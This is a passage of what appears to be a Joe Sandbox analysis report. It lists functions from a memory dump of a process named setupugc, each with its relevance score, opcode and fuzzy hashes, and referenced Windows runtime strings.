                          • Opcode Fuzzy Hash: 486779ff520e58babb001b75934e48c4dc0b2d947f7dda422ba096b0276b0792
                          • Instruction Fuzzy Hash: 7821517AE00619ABCB10DF69CC40AEFB7ECEF44684F080626E955E7200E734D9018BE1
                          Function 0391F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                          Download Yara Rule
                          Strings
                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 039602BD
                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 039602E7
                          • RTL: Re-Waiting, xrefs: 0396031E
                          Memory Dump Source
                          • Source File: 00000011.00000002.4112093368.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                          • Associated: 00000011.00000002.4112093368.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000011.00000002.4112093368.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000011.00000002.4112093368.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_38c0000_setupugc.jbxd
                          Similarity
                          • API ID:
                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                          • API String ID: 0-2474120054
                          • Opcode ID: e2d2e8322bacb1ae74c2061c67167458e3bfa7bffcf38e2ea1968c6dadb1e9b4
                          • Instruction ID: 69948268721b64360fe9c2537abebb7dbe172a5968dbf9c812f78cf5ceffcc6c
                          • Opcode Fuzzy Hash: e2d2e8322bacb1ae74c2061c67167458e3bfa7bffcf38e2ea1968c6dadb1e9b4
                          • Instruction Fuzzy Hash: 9BE1DC716087499FD725DF28C884B2AB7E8BF84364F180A6DF4A69B3E0D774D854CB42
                          Function 0392BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                          Download Yara Rule
                          Strings
                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03967B7F
                          • RTL: Re-Waiting, xrefs: 03967BAC
                          • RTL: Resource at %p, xrefs: 03967B8E
                          Memory Dump Source
                          • Source File: 00000011.00000002.4112093368.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                          • Associated: 00000011.00000002.4112093368.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000011.00000002.4112093368.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000011.00000002.4112093368.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_38c0000_setupugc.jbxd
                          Similarity
                          • API ID:
                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                          • API String ID: 0-871070163
                          • Opcode ID: 334793bfcd81e8b95e903cd449961e9ffbcafbc2b143e635b0ca9b0bb0106df4
                          • Instruction ID: 9a86efa35f7d8a6b1d9f4ea71a919f66acf0f971e1f58efc6c2895e79c13591f
                          • Opcode Fuzzy Hash: 334793bfcd81e8b95e903cd449961e9ffbcafbc2b143e635b0ca9b0bb0106df4
                          • Instruction Fuzzy Hash: C5410435305B029FD724DE65CC40B6ABBE9EF88720F040A1DF95AEB680DB31E405CB91
                          Function 0392B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                          Download Yara Rule
                          APIs
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0396728C
                          Strings
                          • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03967294
                          • RTL: Re-Waiting, xrefs: 039672C1
                          • RTL: Resource at %p, xrefs: 039672A3
                          Memory Dump Source
                          • Source File: 00000011.00000002.4112093368.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                          • Associated: 00000011.00000002.4112093368.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000011.00000002.4112093368.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000011.00000002.4112093368.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_38c0000_setupugc.jbxd
                          Similarity
                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                          • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                          • API String ID: 885266447-605551621
                          • Opcode ID: 13f6dad3ccde10ba80895fa730460d221f20aa60b6654cfb5990c89ee85a4292
                          • Instruction ID: 053090d102bb98028789e08b7715854f6f5641fb9b8c4f4a6ded4627d216b525
                          • Opcode Fuzzy Hash: 13f6dad3ccde10ba80895fa730460d221f20aa60b6654cfb5990c89ee85a4292
                          • Instruction Fuzzy Hash: 3141EE36701716ABD720DE65CC81F6ABBE9FB84754F140A19F856EB280DB31F8428BD1
                          Function 039A2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000011.00000002.4112093368.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                          • Associated: 00000011.00000002.4112093368.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000011.00000002.4112093368.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000011.00000002.4112093368.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_38c0000_setupugc.jbxd
                          Similarity
                          • API ID: ___swprintf_l
                          • String ID: %%%u$]:%u
                          • API String ID: 48624451-3050659472
                          • Opcode ID: 8c036a5a934a0b3d389574d14803d7581a331c040192c70ff783327aa11f2477
                          • Instruction ID: ac3f5e5f32f72dafce18efb802809cd3a4c9574746768b8aecceb99705712495
                          • Opcode Fuzzy Hash: 8c036a5a934a0b3d389574d14803d7581a331c040192c70ff783327aa11f2477
                          • Instruction Fuzzy Hash: 4B314676A006299FCB20DF2DDC40BEEB7FCEF45654F454995E889E7240EF309A458BA0
                          Function 03937D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000011.00000002.4112093368.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                          • Associated: 00000011.00000002.4112093368.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000011.00000002.4112093368.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000011.00000002.4112093368.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_38c0000_setupugc.jbxd
                          Similarity
                          • API ID: __aulldvrm
                          • String ID: +$-
                          • API String ID: 1302938615-2137968064
                          • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                          • Instruction ID: 43403293434a17c0819d5470c098a2e89f7b82bb65c0ab6ba4026980d3be3f2b
                          • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                          • Instruction Fuzzy Hash: AC9194F5E0021A9BDF24DFA9C8816FEB7B9FF467A0F18451AE865E72D0D73099408B50
                          Function 038F9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000011.00000002.4112093368.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                          • Associated: 00000011.00000002.4112093368.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000011.00000002.4112093368.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000011.00000002.4112093368.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_38c0000_setupugc.jbxd
                          Similarity
                          • API ID:
                          • String ID: $$@
                          • API String ID: 0-1194432280
                          • Opcode ID: 86c1f99f116718411e33d85c0003f0068913d228b86b9bae4e9a19426816fbc8
                          • Instruction ID: 62410d381c727ea0943dc8e70ffa2ce102f8e41d8851e62ddde045b96e27b878
                          • Opcode Fuzzy Hash: 86c1f99f116718411e33d85c0003f0068913d228b86b9bae4e9a19426816fbc8
                          • Instruction Fuzzy Hash: 8E813C75D012699FDB21DF94CC44BEAB7B8AB48750F0445EAEA19BB280D7305E84CFA0